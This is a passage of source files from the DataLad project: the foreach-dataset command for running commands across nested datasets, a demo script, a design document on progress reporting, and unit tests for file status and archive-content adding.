"alpha_fraction": 0.5500293374061584, "alphanum_fraction": 0.5510432720184326, "avg_line_length": 40.36644744873047, "blob_id": "64fd3438efef51964e073c2d5048394716d064ff", "content_id": "23418a977f4d649bb61408eed6f57e3deb5da17d", "detected_licenses": [ "BSD-3-Clause", "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18739, "license_type": "permissive", "max_line_length": 116, "num_lines": 453, "path": "/datalad/local/foreach_dataset.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Plumbing command for running a command on each (sub)dataset\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n\nimport inspect\nimport logging\nimport os.path as op\nimport sys\nfrom typing import Union\n\nfrom argparse import REMAINDER\nfrom itertools import chain\nfrom tempfile import mkdtemp\n\nfrom datalad.cmd import NoCapture, StdOutErrCapture\nfrom datalad.core.local.run import normalize_command\n\nfrom datalad.distribution.dataset import (\n Dataset,\n EnsureDataset,\n datasetmethod,\n require_dataset,\n)\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom datalad.interface.common_opts import (\n contains,\n dataset_state,\n jobs_opt,\n recursion_flag,\n recursion_limit,\n)\nfrom datalad.interface.results import get_status_dict\nfrom datalad.support.constraints import (\n EnsureBool,\n EnsureChoice,\n EnsureNone,\n)\nfrom datalad.support.exceptions import InsufficientArgumentsError\nfrom datalad.support.parallel import (\n ProducerConsumer,\n ProducerConsumerProgressLog,\n no_parentds_in_futures,\n no_subds_in_futures,\n)\nfrom datalad.support.param import Parameter\nfrom datalad.utils import (\n SequenceFormatter,\n chpwd as chpwd_cm,\n getpwd,\n nothing_cm,\n shortened_repr,\n swallow_outputs,\n)\n\nlgr = logging.getLogger('datalad.local.foreach_dataset')\n\n\n_PYTHON_CMDS = {\n 'exec': exec,\n 'eval': eval\n}\n\n# Centralize definition with delayed assignment for 'auto' for each case\n_SAFE_TO_CONSUME_MAP = {\n 'auto': lambda: 1/0, # must be defined based on bottomup\"\n 'all-subds-done': no_subds_in_futures,\n 'superds-done': no_parentds_in_futures,\n 'always': None\n}\n\n@build_doc\nclass ForEachDataset(Interface):\n r\"\"\"Run a command or Python code on the dataset and/or each of its sub-datasets.\n\n This command provides a convenience for the cases were no dedicated DataLad command\n is provided to operate across the hierarchy of datasets. It is very similar to\n `git submodule foreach` command with the following major differences\n\n - by default (unless [CMD: --subdatasets-only CMD][PY: `subdatasets_only=True` PY]) it would\n include operation on the original dataset as well,\n - subdatasets could be traversed in bottom-up order,\n - can execute commands in parallel (see `jobs` option), but would account for the order,\n e.g. in bottom-up order command is executed in super-dataset only after it is executed\n in all subdatasets.\n\n Additional notes:\n\n - for execution of \"external\" commands we use the environment used to execute external\n git and git-annex commands.\n\n *Command format*\n\n || REFLOW >>\n [CMD: --cmd-type external CMD][PY: cmd_type='external' PY]: A few placeholders are\n supported in the command via Python format specification:\n << REFLOW ||\n\n\n - \"{pwd}\" will be replaced with the full path of the current working directory.\n - \"{ds}\" and \"{refds}\" will provide instances of the dataset currently\n operated on and the reference \"context\" dataset which was provided via ``dataset``\n argument.\n - \"{tmpdir}\" will be replaced with the full path of a temporary directory.\n \"\"\"\n _examples_ = [\n dict(text=\"Aggressively git clean all datasets, running 5 parallel jobs\",\n code_py=\"foreach_dataset(['git', 'clean', '-dfx'], recursive=True, jobs=5)\",\n code_cmd=\"datalad foreach-dataset -r -J 5 git clean -dfx\"),\n ]\n\n _params_ = dict(\n cmd=Parameter(\n args=(\"cmd\",),\n nargs=REMAINDER,\n metavar='COMMAND',\n doc=\"\"\"command for execution. [CMD: A leading '--' can be used to\n disambiguate this command from the preceding options to DataLad.\n For --cmd-type exec or eval only a single\n command argument (Python code) is supported. CMD]\n [PY: For `cmd_type='exec'` or `cmd_type='eval'` (Python code) should\n be either a string or a list with only a single item. If 'eval', the\n actual function can be passed, which will be provided all placeholders\n as keyword arguments. PY]\n \"\"\"),\n cmd_type=Parameter(\n args=(\"--cmd-type\",),\n constraints=EnsureChoice('auto', 'external', 'exec', 'eval'),\n doc=\"\"\"type of the command. `external`: to be run in a child process using dataset's runner;\n 'exec': Python source code to execute using 'exec(), no value returned;\n 'eval': Python source code to evaluate using 'eval()', return value is placed into 'result' field.\n 'auto': If used via Python API, and `cmd` is a Python function, it will use 'eval', and\n otherwise would assume 'external'.\"\"\"),\n # Following options are taken from subdatasets\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"specify the dataset to operate on. If\n no dataset is given, an attempt is made to identify the dataset\n based on the input and/or the current working directory\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n state=dataset_state,\n recursive=recursion_flag,\n recursion_limit=recursion_limit,\n contains=contains,\n bottomup=Parameter(\n args=(\"--bottomup\",),\n action=\"store_true\",\n doc=\"\"\"whether to report subdatasets in bottom-up order along\n each branch in the dataset tree, and not top-down.\"\"\"),\n # Possible extra options to be introduced if use-case/demand comes\n # TODO: --diff to provide `diff` record so any arbitrary git reset --hard etc desire could be fulfilled\n # TODO: --lower-recursion-limit aka --mindepth of find to replace subdatasets-only.\n # or may be recursion_limit could be made more sophisticated to be able to specify range\n subdatasets_only=Parameter(\n args=(\"-s\", \"--subdatasets-only\"),\n action=\"store_true\",\n doc=\"\"\"whether to exclude top level dataset. It is implied if a non-empty\n `contains` is used\"\"\"),\n output_streams=Parameter(\n args=(\"--output-streams\", \"--o-s\"),\n constraints=EnsureChoice('capture', 'pass-through', 'relpath'),\n doc=\"\"\"ways to handle outputs. 'capture' and return outputs from 'cmd' in the record ('stdout',\n 'stderr'); 'pass-through' to the screen (and thus absent from returned record); prefix with 'relpath'\n captured output (similar to like grep does) and write to stdout and stderr. In 'relpath', relative path\n is relative to the top of the dataset if `dataset` is specified, and if not - relative to current\n directory.\"\"\"),\n chpwd=Parameter(\n args=(\"--chpwd\",),\n constraints=EnsureChoice('ds', 'pwd'),\n doc=\"\"\"'ds' will change working directory to the top of the corresponding dataset. With 'pwd'\n no change of working directory will happen.\n Note that for Python commands, due to use of threads, we do not allow chdir=ds to be used\n with jobs > 1. Hint: use 'ds' and 'refds' objects' methods to execute commands in the context\n of those datasets.\n \"\"\"),\n safe_to_consume=Parameter(\n args=(\"--safe-to-consume\",),\n constraints=EnsureChoice(*_SAFE_TO_CONSUME_MAP),\n doc=\"\"\"Important only in the case of parallel (jobs greater than 1) execution.\n 'all-subds-done' instructs to not consider superdataset until command finished execution\n in all subdatasets (it is the value in case of 'auto' if traversal is bottomup).\n 'superds-done' instructs to not process subdatasets until command finished in the super-dataset\n (it is the value in case of 'auto' in traversal is not bottom up, which is the default). With\n 'always' there is no constraint on either to execute in sub or super dataset.\n \"\"\"),\n jobs=jobs_opt,\n )\n\n @staticmethod\n @datasetmethod(name='foreach_dataset')\n @eval_results\n def __call__(\n cmd,\n *,\n cmd_type=\"auto\",\n dataset=None,\n state='present',\n recursive=False,\n recursion_limit=None,\n contains=None,\n bottomup=False,\n subdatasets_only=False,\n output_streams='pass-through',\n chpwd='ds', # as the most common case/scenario\n safe_to_consume='auto',\n jobs=None\n ):\n if not cmd:\n raise InsufficientArgumentsError(\"No command given\")\n\n if safe_to_consume not in _SAFE_TO_CONSUME_MAP:\n raise ValueError(f\"safe_to_consume - Unknown value {safe_to_consume!r}. \"\n f\"Known are: {', '.join(_SAFE_TO_CONSUME_MAP)}\")\n if safe_to_consume == 'auto':\n safe_to_consume_func = no_subds_in_futures if bottomup else no_parentds_in_futures\n else:\n safe_to_consume_func = _SAFE_TO_CONSUME_MAP[safe_to_consume]\n\n if cmd_type == 'auto':\n cmd_type = 'eval' if _is_callable(cmd) else 'external'\n\n python = cmd_type in _PYTHON_CMDS\n\n if python:\n if _is_callable(cmd):\n if cmd_type != 'eval':\n raise ValueError(f\"Can invoke provided function only in 'eval' mode. {cmd_type!r} was provided\")\n else:\n # yoh decided to avoid unnecessary complication/inhomogeneity with support\n # of multiple Python commands for now; and also allow for a single string command\n # in Python interface\n if isinstance(cmd, (list, tuple)):\n if len(cmd) > 1:\n raise ValueError(f\"Please provide a single Python expression. Got {len(cmd)}: {cmd!r}\")\n cmd = cmd[0]\n\n if not isinstance(cmd, str):\n raise ValueError(f\"Please provide a single Python expression or a function. Got {cmd!r}\")\n else:\n if _is_callable(cmd):\n raise ValueError(f\"cmd_type={cmd_type} but a function {cmd} was provided\")\n protocol = NoCapture if output_streams == 'pass-through' else StdOutErrCapture\n\n refds = require_dataset(\n dataset, check_installed=True, purpose='foreach-dataset execution')\n pwd = getpwd() # Note: 'run' has some more elaborate logic for this\n\n #\n # Producer -- datasets to act on\n #\n subdatasets_it = refds.subdatasets(\n state=state,\n recursive=recursive, recursion_limit=recursion_limit,\n contains=contains,\n bottomup=bottomup,\n result_xfm='paths',\n result_renderer='disabled',\n return_type='generator',\n )\n\n if subdatasets_only or contains:\n datasets_it = subdatasets_it\n else:\n if bottomup:\n datasets_it = chain(subdatasets_it, [refds.path])\n else:\n datasets_it = chain([refds.path], subdatasets_it)\n\n #\n # Consumer - one for all cmd_type's\n #\n def run_cmd(dspath):\n ds = Dataset(dspath)\n status_rec = get_status_dict(\n 'foreach-dataset',\n ds=ds,\n path=ds.path,\n command=cmd\n )\n if not ds.is_installed():\n yield dict(\n status_rec,\n status=\"impossible\",\n message=\"not installed\"\n )\n return\n # For consistent environment (Python) and formatting (command) similar to `run` one\n # But for Python command we provide actual ds and refds not paths\n placeholders = dict(\n pwd=pwd,\n # pass actual instances so .format could access attributes even for external commands\n ds=ds, # if python else ds.path,\n dspath=ds.path, # just for consistency with `run`\n refds=refds, # if python else refds.path,\n # Check if the command contains \"tmpdir\" to avoid creating an\n # unnecessary temporary directory in most but not all cases.\n # Note: different from 'run' - not wrapping match within {} and doing str\n tmpdir=mkdtemp(prefix=\"datalad-run-\") if \"tmpdir\" in str(cmd) else \"\")\n try:\n if python:\n if isinstance(cmd, str):\n cmd_f, cmd_a, cmd_kw = _PYTHON_CMDS[cmd_type], (cmd, placeholders), {}\n else:\n assert _is_callable(cmd)\n # all placeholders are passed as kwargs to the function\n cmd_f, cmd_a, cmd_kw = cmd, [], placeholders\n\n cm = chpwd_cm(ds.path) if chpwd == 'ds' else nothing_cm()\n with cm:\n if output_streams == 'pass-through':\n res = cmd_f(*cmd_a, **cmd_kw)\n out = {}\n elif output_streams in ('capture', 'relpath'):\n with swallow_outputs() as cmo:\n res = cmd_f(*cmd_a, **cmd_kw)\n out = {\n 'stdout': cmo.out,\n 'stderr': cmo.err,\n }\n else:\n raise RuntimeError(output_streams)\n if cmd_type == 'eval':\n status_rec['result'] = res\n else:\n assert res is None\n else:\n try:\n cmd_expanded = format_command(cmd, **placeholders)\n except KeyError as exc:\n yield dict(\n status_rec,\n status='impossible',\n message=('command has an unrecognized placeholder: %s', exc))\n return\n out = ds.repo._git_runner.run(\n cmd_expanded,\n cwd=ds.path if chpwd == 'ds' else pwd,\n protocol=protocol)\n if output_streams in ('capture', 'relpath'):\n status_rec.update(out)\n # provide some feedback to user in default rendering\n if any(out.values()):\n status_rec['message'] = shortened_repr(out, 100)\n status_rec['status'] = 'ok'\n yield status_rec\n except Exception as exc:\n # get a better version with exception handling redoing the whole\n # status dict from scratch\n yield get_status_dict(\n 'foreach-dataset',\n ds=ds,\n path=ds.path,\n command=cmd,\n exception=exc,\n status='error',\n message=str(exc)\n )\n\n if output_streams == 'pass-through':\n pc_class = ProducerConsumer\n pc_kw = {}\n else:\n pc_class = ProducerConsumerProgressLog\n pc_kw = dict(lgr=lgr, label=\"foreach-dataset\", unit=\"datasets\")\n\n if python:\n effective_jobs = pc_class.get_effective_jobs(jobs)\n if effective_jobs > 1:\n warning = \"\"\n if chpwd == 'ds':\n warning += \\\n \"Execution of Python commands in parallel threads while changing directory \" \\\n \"is not thread-safe. \"\n if output_streams in ('capture', 'relpath'):\n warning += \\\n \"Execution of Python commands in parallel while capturing output is not possible.\"\n if warning:\n lgr.warning(\"Got jobs=%d. %s We will execute without parallelization\", jobs, warning)\n jobs = 0 # no threading even between producer/consumer\n\n yield from pc_class(\n producer=datasets_it,\n consumer=run_cmd,\n # probably not needed\n # It is ok to start with subdatasets since top dataset already exists\n safe_to_consume=safe_to_consume_func,\n # or vice versa\n jobs=jobs,\n **pc_kw\n )\n\n @staticmethod\n def custom_result_renderer(res, **kwargs):\n from datalad.interface.utils import generic_result_renderer\n if kwargs.get('output_streams') == 'relpath':\n from datalad.log import no_progress\n with no_progress():\n ds: Union[str, Dataset] = kwargs.get('dataset')\n if ds:\n if not isinstance(ds, Dataset):\n ds = Dataset(ds) # so all ///, ^ etc get treated\n refpath = ds.path\n else:\n refpath = getpwd()\n for k in ('stdout', 'stderr'):\n v = res.get(k)\n if v:\n path = res.get('path')\n relpath = op.relpath(path, refpath) if path else ''\n if relpath == op.curdir:\n relpath = ''\n if relpath and not relpath.endswith(op.sep):\n relpath += op.sep\n out = getattr(sys, k)\n for l in v.splitlines():\n out.write(f\"{relpath}{l}\\n\")\n else:\n generic_result_renderer(res)\n\n# Reduced version from run\ndef format_command(command, **kwds):\n \"\"\"Plug in placeholders in `command`.\n\n Parameters\n ----------\n dset : Dataset\n command : str or list\n\n `kwds` is passed to the `format` call.\n\n Returns\n -------\n formatted command (str)\n \"\"\"\n command = normalize_command(command)\n sfmt = SequenceFormatter()\n return sfmt.format(command, **kwds)\n\n\ndef _is_callable(f):\n return inspect.isfunction(f) or inspect.isbuiltin(f)\n" }, { "alpha_fraction": 0.76932293176651, "alphanum_fraction": 0.776512861251831, "avg_line_length": 37.8139533996582, "blob_id": "f59356e737a8434cca3f920c26e2831b823c9df3", "content_id": "0849c6dbfa4b650df1fd8301be1086e0e6856371", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1669, "license_type": "permissive", "max_line_length": 144, "num_lines": 43, "path": "/docs/casts/seamless_nested_repos.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "say \"DataLad makes a tree of nested Git repositories feel like a big monorepo...\"\n\nsay \"Let's create a root dataset\"\nrun \"datalad create demo\"\nrun \"cd demo\"\nsay \"Any DataLad dataset is just a Git repo with some initial configuration\"\nrun \"git log --oneline\"\n\nsay \"We can nest datasets, by telling DataLad to register a new dataset in a parent dataset\"\nrun \"datalad create -d . sub1\"\nsay \"A subdataset is a regular Git submodule\"\nrun \"git submodule\"\n\nsay \"Datasets can be nested arbitrarily deep\"\nrun \"datalad create -d . sub1/justadir/sub2\"\n\nsay \"Unlike Git, DataLad automatically takes care of committing all changes associated with the added subdataset up to the given parent dataset\"\nrun \"datalad status\"\n\nsay \"Let's create some content in the deepest subdataset\"\nrun \"mkdir sub1/justadir/sub2/anotherdir\"\nrun \"touch sub1/justadir/sub2/anotherdir/afile\"\n\nsay \"Git only reports changes within a repository, in the case the whole subdataset\"\nrun \"git status\"\n\nsay \"DataLad considers the entire tree\"\nrun \"datalad status -r\"\n\nsay \"Like Git, it can report individual untracked files, but also across repository boundaries\"\nrun \"datalad status -r --untracked all\"\n\nsay \"Adding this new content with Git or git-annex would be an exercise\"\nrun_expfail \"git add sub1/justadir/sub2/anotherdir/afile\"\n\nsay \"Again, DataLad does not require users to determine the correct repository\"\nrun \"datalad save -d . sub1/justadir/sub2/anotherdir/afile\"\n\nsay \"All associated changes in the entire dataset tree were committed\"\nrun \"datalad status\"\n\nsay \"DataLad's 'diff' is able to report the changes from these related commits throughout the repository tree\"\nrun \"datalad diff -r -f @~1\"\n" }, { "alpha_fraction": 0.7143410444259644, "alphanum_fraction": 0.7155027985572815, "avg_line_length": 36.97549057006836, "blob_id": "12833308bacbbc1f13e555cd0f51d8b5ccdd11b8", "content_id": "412c6227fe08e3cdd8f45fc6bde450139ff59a6a", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 7747, "license_type": "permissive", "max_line_length": 84, "num_lines": 204, "path": "/docs/source/design/progress_reporting.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_progress_reporting:\n\n******************\nProgress reporting\n******************\n\n.. topic:: Specification scope and status\n\n This specification describes the current implementation.\n\n\nProgress reporting is implemented via the logging system. A dedicated function\n:py:func:`datalad.log.log_progress` represents the main API for progress\nreporting. For some standard use cases, the utilities\n:py:func:`datalad.log.with_progress` and\n:py:func:`datalad.log.with_result_progress` can simplify result reporting\nfurther.\n\n\nDesign and implementation\n=========================\n\nThis basic idea is to use an instance of datalad's loggers to emit log messages\nwith particular attributes that are picked up by\n:py:class:`datalad.log.ProgressHandler` (derived from\n:py:class:`logging.Handler`), and are acted on differently, depending on\nconfiguration and conditions of a session (e.g., interactive terminal sessions\nvs. non-interactive usage in scripts). This variable behavior is implemented\nvia the use of :py:mod:`logging` standard library log filters and handlers.\nRoughly speaking, :py:class:`datalad.log.ProgressHandler` will only be used for\ninteractive sessions. In non-interactive cases, progress log messages are\ninspected by :py:func:`datalad.log.filter_noninteractive_progress`, and are\neither discarded or treated like any other log message (see\n:py:meth:`datalad.log.LoggerHelper.get_initialized_logger` for details on the\nhandler and filter setup).\n\n:py:class:`datalad.log.ProgressHandler` inspects incoming log records for\nattributes with names starting with `dlm_progress`. It will only process such\nrecords and pass others on to the underlying original log handler otherwise.\n\n:py:class:`datalad.log.ProgressHandler` takes care of creating, updating and\ndestroying any number of simultaneously running progress bars. Progress reports\nmust identify the respective process via an arbitrary string ID. It is the\ncaller's responsibility to ensure that this ID is unique to the target\nprocess/activity.\n\n\nReporting progress with `log_progress()`\n========================================\n\nTypical progress reporting via :py:func:`datalad.log.log_progress` involves\nthree types of calls.\n\n1. Start reporting progress about a process\n-------------------------------------------\n\nA typical call to start of progress reporting looks like this\n\n.. code-block:: python\n\n log_progress(\n # the callable used to emit log messages\n lgr.info,\n # a unique identifiers of the activity progress is reported for\n identifier,\n # main message\n 'Unlocking files',\n # optional unit string for a progress bar\n unit=' Files',\n # optional label to be displayed in a progress bar\n label='Unlocking',\n # maximum value for a progress bar\n total=nfiles,\n )\n\nA new progress bar will be created automatically for any report with a previously\nunseen activity ``identifier``. It can be configured via the specification of\na number of arguments, most notably a target ``total`` for the progress bar.\nSee :py:func:`datalad.log.log_progress` for a complete overview.\n\nStarting a progress report must be done with a dedicated call. It cannot be combined\nwith a progress update.\n\n\n2. Update progress information about a process\n----------------------------------------------\n\nAny subsequent call to :py:func:`datalad.log.log_progress` with an activity\nidentifier that has already been seen either updates, or finishes the progress\nreporting for an activity. Updates must contain an ``update`` key which either\nspecifies a new value (if `increment=False`, the default) or an increment to\npreviously known value (if `increment=True`):\n\n.. code-block:: python\n\n log_progress(\n lgr.info,\n # must match the identier used to start the progress reporting\n identifier,\n # arbitrary message content, string expansion supported just like\n # regular log messages\n \"Files to unlock %i\", nfiles,\n # critical key for report updates\n update=1,\n # ``update`` could be an absolute value or an increment\n increment=True\n )\n\nUpdating a progress report can only be done after a progress reporting was\ninitialized (see above).\n\n\n3. Report completion of a process\n---------------------------------\n\nA progress bar will remain active until it is explicitly taken down, even if an\ninitially declared ``total`` value may have been reached. Finishing a progress\nreport requires a final log message with the corresponding identifiers which,\nlike the first initializing message, does NOT contain an ``update`` key.\n\n.. code-block:: python\n\n log_progress(\n lgr.info,\n identifier,\n # closing log message\n \"Completed unlocking files\",\n )\n\n\nProgress reporting in non-interactive sessions\n----------------------------------------------\n\n:py:func:`datalad.log.log_progress` takes a `noninteractive_level` argument\nthat can be used to specify a log level at which progress is logged when no\nprogress bars can be used, but actual log messages are produced.\n\n.. code-block:: python\n\n import logging\n\n log_progress(\n lgr.info,\n identifier,\n \"Completed unlocking files\",\n noninteractive_level=logging.INFO\n )\n\nEach call to :py:func:`~datalad.log.log_progress` can be given a different\nlog level, in order to control the verbosity of the reporting in such a scenario.\nFor example, it is possible to log the start or end of an activity at a higher\nlevel than intermediate updates. It is also possible to single out particular\nintermediate events, and report them at a higher level.\n\nIf no `noninteractive_level` is specified, the progress update is unconditionally\nlogged at the level implied by the given logger callable. \n\n\nReporting progress with `with_(result_)progress()`\n==================================================\n\nFor cases were a list of items needs to be processes sequentially, and progress\nshall be communicated, two additional helpers could be used: the decorators\n:py:func:`datalad.log.with_progress` and\n:py:func:`datalad.log.with_result_progress`. They require a callable that takes\na list (or more generally a sequence) of items to be processed as the first\npositional argument. They both set up and perform all necessary calls to\n:py:func:`~datalad.log.log_progress`.\n\nThe difference between these helpers is that\n:py:func:`datalad.log.with_result_progress` expects a callable to produce\nDataLad result records, and supports customs filters to decide which particular\nresult records to consider for progress reporting (e.g., only records for a\nparticular `action` and `type`).\n\n\nOutput non-progress information without interfering with progress bars\n======================================================================\n\n:py:func:`~datalad.log.log_progress` can also be useful when not reporting\nprogress, but ensuring that no other output is interfering with progress bars,\nand vice versa. The argument `maint` can be used in this case, with no\nparticular activity identifier (it always impacts all active progress bars):\n\n\n.. code-block:: python\n\n log_progress(\n lgr.info,\n None,\n 'Clear progress bars',\n maint='clear',\n )\n\n\nThis call will trigger a temporary discontinuation of any progress bar display.\nProgress bars can either be re-enabled all at once, by an analog message with\n``maint='refresh'``, or will re-show themselves automatically when the next\nupdate is received. A :py:func:`~datalad.log.no_progress` context manager helper\ncan be used to surround your context with those two calls to prevent progress\nbars from interfering.\n" }, { "alpha_fraction": 0.6125584244728088, "alphanum_fraction": 0.6359385251998901, "avg_line_length": 41.771427154541016, "blob_id": "d9917beac18bb872bcb24ebcdf7298b3069776c9", "content_id": "31e53f819964347673bbfca0775957424d39e391", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1497, "license_type": "permissive", "max_line_length": 87, "num_lines": 35, "path": "/datalad/support/tests/test_status.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n assert_not_equal,\n)\n\nfrom ..status import FileStatus\n\n\ndef test_FileStatus_basic():\n assert_equal(FileStatus(size=0), FileStatus(size=0))\n assert_not_equal(FileStatus(size=0), FileStatus(size=1))\n # mtimes allow trimming if one is int\n assert_equal(FileStatus(mtime=0), FileStatus(mtime=0.9999))\n assert_equal(FileStatus(mtime=0), FileStatus(mtime=0.0001))\n assert_not_equal(FileStatus(mtime=0.2), FileStatus(mtime=0.1))\n assert_not_equal(FileStatus(mtime=0.2), FileStatus(mtime=None))\n assert_not_equal(FileStatus(mtime=1), FileStatus(mtime=None))\n # And with None should be False\n assert_not_equal(FileStatus(mtime=1), None)\n assert_not_equal(None, FileStatus(mtime=1))\n # adding more information would result in not-equal\n assert_not_equal(FileStatus(size=0), FileStatus(size=0, mtime=123))\n # empty ones can't be compared\n # TODO: actually not clear why that NotImplemented singleton is not returned\n assert_not_equal(FileStatus(), FileStatus())\n #assert_false(FileStatus() != FileStatus())\n" }, { "alpha_fraction": 0.542140781879425, "alphanum_fraction": 0.5561943650245667, "avg_line_length": 37.415645599365234, "blob_id": "1ec4260f07e55ad537e8b6fc1ffe10b23c435f8f", "content_id": "8a7b92e0f8c3bf11d173ec8b0ef9271980183aba", "detected_licenses": [ "LicenseRef-scancode-unknown-license-reference", "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 25047, "license_type": "permissive", "max_line_length": 116, "num_lines": 652, "path": "/datalad/local/tests/test_add_archive_content.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for add-archive-content command\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport os\nimport tempfile\nfrom glob import glob\nfrom os import unlink\nfrom os.path import (\n basename,\n exists,\n)\nfrom os.path import join as opj\nfrom os.path import (\n lexists,\n pardir,\n)\nfrom pathlib import Path\n\nfrom datalad.api import (\n Dataset,\n add_archive_content,\n clean,\n)\nfrom datalad.consts import (\n ARCHIVES_SPECIAL_REMOTE,\n DATALAD_SPECIAL_REMOTES_UUIDS,\n)\nfrom datalad.support.exceptions import (\n CommandError,\n NoDatasetFound,\n)\nfrom datalad.support.external_versions import external_versions\nfrom datalad.tests.utils_pytest import (\n assert_cwd_unchanged,\n assert_equal,\n assert_false,\n assert_in,\n assert_in_results,\n assert_not_in,\n assert_raises,\n assert_repo_status,\n assert_result_values_cond,\n assert_true,\n create_tree,\n eq_,\n integration,\n known_failure_windows,\n ok_,\n ok_archives_caches,\n ok_file_has_content,\n ok_file_under_git,\n serve_path_via_http,\n skip_if,\n skip_if_adjusted_branch,\n swallow_outputs,\n with_tempfile,\n with_tree,\n xfail_buggy_annex_info,\n)\nfrom datalad.utils import (\n chpwd,\n find_files,\n get_tempfile_kwargs,\n getpwd,\n on_windows,\n rmtemp,\n)\n\ntreeargs = dict(\n tree=(\n ('1.tar.gz', (\n ('crcns_pfc-1_data', (('CR24A', (\n ('behaving1', {'1 f.txt': '1 f load'}),)),)),\n ('crcns_pfc-1_data', (('CR24C', (\n ('behaving3', {'3 f.txt': '3 f load'}),)),)),\n ('crcns_pfc-1_data', (('CR24D', (\n ('behaving2', {'2 f.txt': '2 f load'}),)),)),\n ('__MACOSX', (('crcns_pfc-2_data', (\n ('CR24B', (\n ('behaving2', {'2 f.txt': '2 f load'}),)),)\n ),)),\n ('crcns_pfc-2_data', (('__MACOSX', (\n ('CR24E', (\n ('behaving2', {'2 f.txt': '2 f load'}),)),)\n ),)),\n\n )),\n )\n)\n\n\n@assert_cwd_unchanged(ok_to_chdir=True)\n@with_tree(**treeargs)\n@serve_path_via_http()\n@with_tempfile(mkdir=True)\ndef test_add_archive_dirs(path_orig=None, url=None, repo_path=None):\n # change to repo_path\n with chpwd(repo_path):\n # create annex repo\n ds = Dataset(repo_path).create(force=True)\n repo = ds.repo\n # add archive to the repo so we could test\n with swallow_outputs():\n repo.add_url_to_file('1.tar.gz', opj(url, '1.tar.gz'))\n repo.commit(\"added 1.tar.gz\")\n\n # test with excludes and annex options\n add_archive_content('1.tar.gz',\n existing='archive-suffix',\n # Since inconsistent and seems in many cases no\n # leading dirs to strip, keep them as provided\n strip_leading_dirs=True,\n delete=True,\n leading_dirs_consider=['crcns.*', '1'],\n leading_dirs_depth=2,\n use_current_dir=False,\n exclude='.*__MACOSX.*') # some junk penetrates\n\n eq_(repo.get_description(\n uuid=DATALAD_SPECIAL_REMOTES_UUIDS[ARCHIVES_SPECIAL_REMOTE]),\n '[%s]' % ARCHIVES_SPECIAL_REMOTE)\n\n all_files = sorted(find_files('.'))\n # posixify paths to make it work on Windows as well\n all_files = [Path(file).as_posix() for file in all_files]\n target_files = {\n 'CR24A/behaving1/1 f.txt',\n 'CR24C/behaving3/3 f.txt',\n 'CR24D/behaving2/2 f.txt',\n '.datalad/config',\n }\n eq_(set(all_files), target_files)\n\n # regression test: the subdir in MACOSX wasn't excluded and its name was\n # getting stripped by leading_dir_len\n # if stripping and exclude didn't work this fails\n assert_false(exists('__MACOSX'))\n # if exclude doesn't work then name of subdir gets stripped by\n # leading_dir_len\n assert_false(exists('c-1_data'))\n # if exclude doesn't work but everything else works this fails\n assert_false(exists('CR24B'))\n\n# within top directory\n# archive is in subdirectory -- adding in the same (or different) directory\n\ntree1args = dict(\n tree=(\n ('1.tar.gz', (\n ('1 f.txt', '1 f load'),\n ('d', (('1d', ''),)), )),\n ('1u', {\n '1.tar.gz': { # updated file content\n '1 f.txt': '1 f load1'\n }}),\n ('2u', { # updated file content\n '1.tar.gz': {\n '1 f.txt': '1 f load2'\n }}),\n ('3u', { # updated file content\n '1.tar.gz': {\n '1 f.txt': '1 f load3'\n }}),\n ('4u', { # updated file content\n '1.tar.gz': {\n '1 f.txt': '1 f load4'\n }}),\n ('d1', (('1.tar.gz', (\n ('2 f.txt', '2 f load'),\n ('d2', (\n ('2d', ''),)\n )),),),),\n )\n)\n\ntree4uargs = dict(\n tree=(\n ('4u', { # updated file content\n '1.tar.gz': {\n '1 f.txt': '1 f load4',\n 'sub.tar.gz': {\n '2 f.txt': '2 f'\n }\n }}),\n )\n)\n\n\n@xfail_buggy_annex_info\n@known_failure_windows\n# apparently fails only sometimes in PY3, but in a way that's common in V6\n@assert_cwd_unchanged(ok_to_chdir=True)\n@with_tree(**tree1args)\n@serve_path_via_http()\n@with_tempfile(mkdir=True)\ndef test_add_archive_content(path_orig=None, url=None, repo_path=None):\n with chpwd(repo_path):\n # TODO we need 